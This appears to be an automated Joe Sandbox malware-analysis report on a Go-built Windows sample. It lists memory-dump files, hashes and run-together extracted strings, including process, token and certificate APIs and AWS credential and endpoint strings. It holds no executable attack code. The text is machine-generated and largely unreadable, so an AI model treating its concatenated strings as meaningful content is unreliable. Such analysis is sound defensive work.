runtime: type offset out of rangetoo many levels of symbolic linksInitializeProcThreadAttributeListAWS_EC2_METADATA_SERVICE_ENDPOINTSharedConfigProfileNotExistsErrorfailed to unmarshal error messageCryptAcquireCertificatePrivateKeyGetVolumeNameForVolumeMountPo, xrefs: 00B42A0C
base hangupkilledlistensocketSundayMondayFridayAugustUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13minutesecond-fips-Bucket%s[%v]PolicyGetAceGetACPsendtoCommonArabicBrahmiCarianChakmaCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTa, xrefs: 00B4287D
out of range no module dataruntime: seq1=runtime: goid= in goroutine file too largelevel 2 haltedlevel 3 haltedtoo many linksno such deviceprotocol errortext file busytoo many usersCryptGenRandomCertCloseStoreCreateProcessWFindFirstFileWFormatMessageWGetConso, xrefs: 00B429AE

Memory Dump Source

Source File: 00000000.00000002.1922670879.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1922658209.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000000F22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000001499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923469307.00000000016F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923484342.00000000016F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923498205.00000000016FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923511349.00000000016FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923524456.00000000016FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923537015.00000000016FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923557216.0000000001728000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923570703.000000000172A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923583104.000000000172B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923596278.0000000001733000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001734000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000173F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001777000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000177C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001839000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923838663.0000000001A47000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923852568.0000000001A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_5EvHHcMjRg.jbxd

Similarity

API ID:
String ID: types : type abortedCopySidWSARecvWSASendconnectsignal TuesdayJanuaryOctoberMUI_StdMUI_Dltdefaultaws_csmoutpostFreeSidSleepExAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamS$ - NaN P m= MPC= < end > and]:???pc= GSunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOctNovDecUTCEET+00+01CATWATEATGMTHSTHDT-03-04-05ESTCSTCDTMSTMDT-02EDTASTADTPSTPDTNSTNDT+06+03+04+07IST+09+08IDT+12PKT+11KST+05JST+10-01-11-12-08-09+13CETBSTMSK-06+14StdDl$ base hangupkilledlistensocketSundayMondayFridayAugustUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13minutesecond-fips-Bucket%s[%v]PolicyGetAceGetACPsendtoCommonArabicBrahmiCarianChakmaCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTa$ etypes no anodeCancelIoReadFileAcceptExWSAIoctlshutdownThursdaySaturdayFebruaryNovemberDecember%!Month(_NewEnum%02d%02drole_arncsm_hostcsm_portUploadIdEqualSidSetEventIsWindowrecvfromnil PoolArmenianBalineseBopomofoBugineseCherokeeCyrillicDuployanEthiopicGeor$ not in ranges:invalid exchangeno route to hostinvalid argumentmessage too longobject is remoteremote I/O errorSetFilePointerExOpenProcessTokenRegQueryInfoKeyWRegQueryValueExWDnsNameCompare_WCreateDirectoryWFlushFileBuffersGetComputerNameWGetFullPathNameWGetL$ out of range no module dataruntime: seq1=runtime: goid= in goroutine file too largelevel 2 haltedlevel 3 haltedtoo many linksno such deviceprotocol errortext file busytoo many usersCryptGenRandomCertCloseStoreCreateProcessWFindFirstFileWFormatMessageWGetConso$!$runtime: type offset base pointer out of rangeruntime: text offset base pointer out of rangeTime.UnmarshalJSON: input is not a JSON stringfailed to find credentials in the environment.reflect: nil type passed to Type.ConvertibleToPSSWithSHA256PSSWithSHA384PSSW$runtime: type offset out of rangetoo many levels of symbolic linksInitializeProcThreadAttributeListAWS_EC2_METADATA_SERVICE_ENDPOINTSharedConfigProfileNotExistsErrorfailed to unmarshal error messageCryptAcquireCertificatePrivateKeyGetVolumeNameForVolumeMountPo$runtime: typeOff runtime: textOff permission deniedwrong medium typeno data availableexec format errorLookupAccountSidWDnsRecordListFreeGetCurrentProcessGetShortPathNameWWSAEnumProtocolsWGTB Standard TimeFLE Standard TimeGMT Standard Timefractional secondCanSe
API String ID: 0-3451407389
Opcode ID: ef742e47edf1987bfc92ad6347e53a3db986c6b429cb04ada2f3bdcdb1923456
Instruction ID: 0c3cec93b7415d5b9aba45549318081288738d8b0ccccb0d3671c8cbe5d59e00
Opcode Fuzzy Hash: ef742e47edf1987bfc92ad6347e53a3db986c6b429cb04ada2f3bdcdb1923456
Instruction Fuzzy Hash: 7981F4B45497059FC744EF64C585A9EBBE0FF88344F8089ADF48887351E734A988EF92

Function 00B42490 Relevance: 12.7, Strings: 10, Instructions: 156COMMON

Download Yara Rule

Strings

etypes no anodeCancelIoReadFileAcceptExWSAIoctlshutdownThursdaySaturdayFebruaryNovemberDecember%!Month(_NewEnum%02d%02drole_arncsm_hostcsm_portUploadIdEqualSidSetEventIsWindowrecvfromnil PoolArmenianBalineseBopomofoBugineseCherokeeCyrillicDuployanEthiopicGeor, xrefs: 00B4262B
types : type abortedCopySidWSARecvWSASendconnectsignal TuesdayJanuaryOctoberMUI_StdMUI_Dltdefaultaws_csmoutpostFreeSidSleepExAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamS, xrefs: 00B42601
runtime: nameOff runtime: typeOff runtime: textOff permission deniedwrong medium typeno data availableexec format errorLookupAccountSidWDnsRecordListFreeGetCurrentProcessGetShortPathNameWWSAEnumProtocolsWGTB Standard TimeFLE Standard TimeGMT Standard Timefract, xrefs: 00B4255F, 00B42694
not in ranges:invalid exchangeno route to hostinvalid argumentmessage too longobject is remoteremote I/O errorSetFilePointerExOpenProcessTokenRegQueryInfoKeyWRegQueryValueExWDnsNameCompare_WCreateDirectoryWFlushFileBuffersGetComputerNameWGetFullPathNameWGetL, xrefs: 00B425B2
- NaN P m= MPC= < end > and]:???pc= GSunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOctNovDecUTCEET+00+01CATWATEATGMTHSTHDT-03-04-05ESTCSTCDTMSTMDT-02EDTASTADTPSTPDTNSTNDT+06+03+04+07IST+09+08IDT+12PKT+11KST+05JST+10-01-11-12-08-09+13CETBSTMSK-06+14StdDl, xrefs: 00B426E7
runtime: name offset base pointer out of rangeruntime: type offset base pointer out of rangeruntime: text offset base pointer out of rangeTime.UnmarshalJSON: input is not a JSON stringfailed to find credentials in the environment.reflect: nil type passed to Ty, xrefs: 00B42671
runtime: name offset out of rangeruntime: type offset out of rangetoo many levels of symbolic linksInitializeProcThreadAttributeListAWS_EC2_METADATA_SERVICE_ENDPOINTSharedConfigProfileNotExistsErrorfailed to unmarshal error messageCryptAcquireCertificatePrivat, xrefs: 00B4271B
!, xrefs: 00B42724
base hangupkilledlistensocketSundayMondayFridayAugustUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13minutesecond-fips-Bucket%s[%v]PolicyGetAceGetACPsendtoCommonArabicBrahmiCarianChakmaCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTa, xrefs: 00B42588
out of range no module dataruntime: seq1=runtime: goid= in goroutine file too largelevel 2 haltedlevel 3 haltedtoo many linksno such deviceprotocol errortext file busytoo many usersCryptGenRandomCertCloseStoreCreateProcessWFindFirstFileWFormatMessageWGetConso, xrefs: 00B426BD

Memory Dump Source

Source File: 00000000.00000002.1922670879.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1922658209.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000000F22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000001499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923469307.00000000016F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923484342.00000000016F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923498205.00000000016FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923511349.00000000016FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923524456.00000000016FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923537015.00000000016FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923557216.0000000001728000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923570703.000000000172A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923583104.000000000172B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923596278.0000000001733000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001734000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000173F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001777000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000177C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001839000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923838663.0000000001A47000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923852568.0000000001A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_5EvHHcMjRg.jbxd

Similarity

API ID:
String ID: types : type abortedCopySidWSARecvWSASendconnectsignal TuesdayJanuaryOctoberMUI_StdMUI_Dltdefaultaws_csmoutpostFreeSidSleepExAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamS$ - NaN P m= MPC= < end > and]:???pc= GSunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOctNovDecUTCEET+00+01CATWATEATGMTHSTHDT-03-04-05ESTCSTCDTMSTMDT-02EDTASTADTPSTPDTNSTNDT+06+03+04+07IST+09+08IDT+12PKT+11KST+05JST+10-01-11-12-08-09+13CETBSTMSK-06+14StdDl$ base hangupkilledlistensocketSundayMondayFridayAugustUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13minutesecond-fips-Bucket%s[%v]PolicyGetAceGetACPsendtoCommonArabicBrahmiCarianChakmaCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTa$ etypes no anodeCancelIoReadFileAcceptExWSAIoctlshutdownThursdaySaturdayFebruaryNovemberDecember%!Month(_NewEnum%02d%02drole_arncsm_hostcsm_portUploadIdEqualSidSetEventIsWindowrecvfromnil PoolArmenianBalineseBopomofoBugineseCherokeeCyrillicDuployanEthiopicGeor$ not in ranges:invalid exchangeno route to hostinvalid argumentmessage too longobject is remoteremote I/O errorSetFilePointerExOpenProcessTokenRegQueryInfoKeyWRegQueryValueExWDnsNameCompare_WCreateDirectoryWFlushFileBuffersGetComputerNameWGetFullPathNameWGetL$ out of range no module dataruntime: seq1=runtime: goid= in goroutine file too largelevel 2 haltedlevel 3 haltedtoo many linksno such deviceprotocol errortext file busytoo many usersCryptGenRandomCertCloseStoreCreateProcessWFindFirstFileWFormatMessageWGetConso$!$runtime: name offset base pointer out of rangeruntime: type offset base pointer out of rangeruntime: text offset base pointer out of rangeTime.UnmarshalJSON: input is not a JSON stringfailed to find credentials in the environment.reflect: nil type passed to Ty$runtime: name offset out of rangeruntime: type offset out of rangetoo many levels of symbolic linksInitializeProcThreadAttributeListAWS_EC2_METADATA_SERVICE_ENDPOINTSharedConfigProfileNotExistsErrorfailed to unmarshal error messageCryptAcquireCertificatePrivat$runtime: nameOff runtime: typeOff runtime: textOff permission deniedwrong medium typeno data availableexec format errorLookupAccountSidWDnsRecordListFreeGetCurrentProcessGetShortPathNameWWSAEnumProtocolsWGTB Standard TimeFLE Standard TimeGMT Standard Timefract
API String ID: 0-2902553473
Opcode ID: 887f8154f148f8d290b26b39689037eb17c257458b532954b00c0fb4b14f445b
Instruction ID: a192bd37712c8bb2ca9b36779d51f49e3e239edb7eeea2c1bd869a8f712b87b0
Opcode Fuzzy Hash: 887f8154f148f8d290b26b39689037eb17c257458b532954b00c0fb4b14f445b
Instruction Fuzzy Hash: 1861F4B45497049FC344EF64C1856AEBBE0FF88704F8189ADF48887352D7749988EF92

Function 00B41600 Relevance: 11.5, Strings: 9, Instructions: 244COMMON

Download Yara Rule

Strings

gp= mp=) m=quitbindJuneJulyEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDT as hourTagsTypeNONEarn:AhomChamKawiLisuMiaoModiNewaThaiToto3125Atoiint8uintchanfuncpartcallkind on != Fromicmpigmpftpspop3smtpmdnsdial unixxn--ermssse3avx2bmi1bmi2aossfipsgluelogs, xrefs: 00B417B3
goroutine terminatedowner diedDnsQuery_WGetIfEntryCancelIoExCreatePipeGetVersionWSACleanupWSAStartupgetsockoptsetsockoptdnsapi.dllws2_32.dlltime.Date(time.Local%!Weekday(not a boolAWS_REGIONsso_regionFailedReadprofile %smfa_serialCopyObjectUploadPartPartNumber, xrefs: 00B4174A
unknown wait reasonnotesleep not on g0GC work not flushed/gc/scan/heap:bytes/gc/heap/goal:bytes/gc/heap/live:bytesbad kind in runfinqmarkroot: bad indexnwait > work.nprocs, gp->atomicstatus=marking free object KiB work (eager), [controller reset]mspan.sweep: , xrefs: 00B41685
m= MPC= < end > and]:???pc= GSunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOctNovDecUTCEET+00+01CATWATEATGMTHSTHDT-03-04-05ESTCSTCDTMSTMDT-02EDTASTADTPSTPDTNSTNDT+06+03+04+07IST+09+08IDT+12PKT+11KST+05JST+10-01-11-12-08-09+13CETBSTMSK-06+14StdDltPUTKeyTa, xrefs: 00B417FC
???pc= GSunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOctNovDecUTCEET+00+01CATWATEATGMTHSTHDT-03-04-05ESTCSTCDTMSTMDT-02EDTASTADTPSTPDTNSTNDT+06+03+04+07IST+09+08IDT+12PKT+11KST+05JST+10-01-11-12-08-09+13CETBSTMSK-06+14StdDltPUTKeyTags3-): subHanLaoMroNkoVa, xrefs: 00B4165D
, locked to threadruntime.semacreateruntime.semawakeupsegmentation faultoperation canceledno child processesRFS specific erroridentifier removedinput/output errormultihop attemptedfile name too longno locks availablestreams pipe errorLookupAccountNameWCreateFi, xrefs: 00B4194C
m=nil base hangupkilledlistensocketSundayMondayFridayAugustUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13minutesecond-fips-Bucket%s[%v]PolicyGetAceGetACPsendtoCommonArabicBrahmiCarianChakmaCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTa, xrefs: 00B41854
(scan)types : type abortedCopySidWSARecvWSASendconnectsignal TuesdayJanuaryOctoberMUI_StdMUI_Dltdefaultaws_csmoutpostFreeSidSleepExAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianS, xrefs: 00B418B3
minutes etypes no anodeCancelIoReadFileAcceptExWSAIoctlshutdownThursdaySaturdayFebruaryNovemberDecember%!Month(_NewEnum%02d%02drole_arncsm_hostcsm_portUploadIdEqualSidSetEventIsWindowrecvfromnil PoolArmenianBalineseBopomofoBugineseCherokeeCyrillicDuployanEthi, xrefs: 00B4191E

Memory Dump Source

Source File: 00000000.00000002.1922670879.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1922658209.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000000F22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000001499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923469307.00000000016F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923484342.00000000016F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923498205.00000000016FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923511349.00000000016FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923524456.00000000016FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923537015.00000000016FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923557216.0000000001728000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923570703.000000000172A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923583104.000000000172B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923596278.0000000001733000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001734000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000173F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001777000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000177C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001839000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923838663.0000000001A47000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923852568.0000000001A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_5EvHHcMjRg.jbxd

Similarity

API ID:
String ID: (scan)types : type abortedCopySidWSARecvWSASendconnectsignal TuesdayJanuaryOctoberMUI_StdMUI_Dltdefaultaws_csmoutpostFreeSidSleepExAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianS$ gp= mp=) m=quitbindJuneJulyEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDT as hourTagsTypeNONEarn:AhomChamKawiLisuMiaoModiNewaThaiToto3125Atoiint8uintchanfuncpartcallkind on != Fromicmpigmpftpspop3smtpmdnsdial unixxn--ermssse3avx2bmi1bmi2aossfipsgluelogs$ m= MPC= < end > and]:???pc= GSunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOctNovDecUTCEET+00+01CATWATEATGMTHSTHDT-03-04-05ESTCSTCDTMSTMDT-02EDTASTADTPSTPDTNSTNDT+06+03+04+07IST+09+08IDT+12PKT+11KST+05JST+10-01-11-12-08-09+13CETBSTMSK-06+14StdDltPUTKeyTa$ m=nil base hangupkilledlistensocketSundayMondayFridayAugustUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13minutesecond-fips-Bucket%s[%v]PolicyGetAceGetACPsendtoCommonArabicBrahmiCarianChakmaCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTa$ minutes etypes no anodeCancelIoReadFileAcceptExWSAIoctlshutdownThursdaySaturdayFebruaryNovemberDecember%!Month(_NewEnum%02d%02drole_arncsm_hostcsm_portUploadIdEqualSidSetEventIsWindowrecvfromnil PoolArmenianBalineseBopomofoBugineseCherokeeCyrillicDuployanEthi$, locked to threadruntime.semacreateruntime.semawakeupsegmentation faultoperation canceledno child processesRFS specific erroridentifier removedinput/output errormultihop attemptedfile name too longno locks availablestreams pipe errorLookupAccountNameWCreateFi$???pc= GSunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOctNovDecUTCEET+00+01CATWATEATGMTHSTHDT-03-04-05ESTCSTCDTMSTMDT-02EDTASTADTPSTPDTNSTNDT+06+03+04+07IST+09+08IDT+12PKT+11KST+05JST+10-01-11-12-08-09+13CETBSTMSK-06+14StdDltPUTKeyTags3-): subHanLaoMroNkoVa$goroutine terminatedowner diedDnsQuery_WGetIfEntryCancelIoExCreatePipeGetVersionWSACleanupWSAStartupgetsockoptsetsockoptdnsapi.dllws2_32.dlltime.Date(time.Local%!Weekday(not a boolAWS_REGIONsso_regionFailedReadprofile %smfa_serialCopyObjectUploadPartPartNumber$unknown wait reasonnotesleep not on g0GC work not flushed/gc/scan/heap:bytes/gc/heap/goal:bytes/gc/heap/live:bytesbad kind in runfinqmarkroot: bad indexnwait > work.nprocs, gp->atomicstatus=marking free object KiB work (eager), [controller reset]mspan.sweep:
API String ID: 0-3360379006
Opcode ID: 27b2e8d839933451aa11a23220366a2f95f917fc50277dadc630009bf9850e29
Instruction ID: 109706a61eb3ef632a4b45150c7ae924e98e525651122528acf749b9272dbdc4
Opcode Fuzzy Hash: 27b2e8d839933451aa11a23220366a2f95f917fc50277dadc630009bf9850e29
Instruction Fuzzy Hash: CEA13974A493058FC700EFA8C1C1A6EBBE5EF89740F5188ADE485C7352D734D989EB92

Function 00AE1CB0 Relevance: 10.3, Strings: 8, Instructions: 326COMMON

Download Yara Rule

Strings

", missing CPU supportVariantTimeToSystemTimeSafeArrayCreateVectorExUS West (N. California)application-autoscalingentitlement.marketplacelogs.af-south-1.api.awslogs.ap-south-1.api.awslogs.ap-south-2.api.awslogs.eu-north-1.api.awslogs.eu-south-1.api.awslogs.eu, xrefs: 00AE1F5F
" not supported for cpu option "acm-fips.ca-west-1.amazonaws.comacm-fips.us-east-1.amazonaws.comacm-fips.us-east-2.amazonaws.comacm-fips.us-west-1.amazonaws.comacm-fips.us-west-2.amazonaws.comapi.ecr.af-south-1.amazonaws.comapi.ecr.ap-south-1.amazonaws.comapi., xrefs: 00AE1E34
GODEBUG: unknown cpu feature "{service}.{region}.{dnsSuffix}appmesh.ap-northeast-1.api.awsappmesh.ap-northeast-2.api.awsappmesh.ap-northeast-3.api.awsappmesh.ap-southeast-1.api.awsappmesh.ap-southeast-2.api.awsappmesh.ap-southeast-3.api.awsappmesh-fips.us-east, xrefs: 00AE2074
GODEBUG: can not enable "unexpected key value typeWindowsGetStringRawBufferSouth America (Sao Paulo)appmesh.ap-east-1.api.awsappmesh.eu-west-1.api.awsappmesh.eu-west-2.api.awsappmesh.eu-west-3.api.awsappmesh.sa-east-1.api.awsappmesh.us-east-1.api.awsappmesh.us, xrefs: 00AE1F35
!, xrefs: 00AE1E9C
cpu., xrefs: 00AE1D21
GODEBUG: value "CoCreateInstanceSafeArrayDestroyDispatchMessageWamazonaws.com.cnCanada (Central)Europe (Ireland)US West (Oregon)amplifyuibuilderapi.fleethub.iotapp-integrationsbillingconductorcognito-identityelasticbeanstalkelasticmapreduceIngestionServiceinge, xrefs: 00AE1E0A
GODEBUG: no value specified for "unaligned 64-bit atomic operationappmesh-fips.ca-central-1.api.awsbedrock-runtime-fips-ca-central-1cloudcontrolapi.ap-east-1.api.awscloudcontrolapi.ca-west-1.api.awscloudcontrolapi.eu-west-1.api.awscloudcontrolapi.eu-west-2.api, xrefs: 00AE1E93

Memory Dump Source

Source File: 00000000.00000002.1922670879.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1922658209.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000000F22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000001499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D1000.00000002.00000001.01000000.00000003.sdmpDownload File
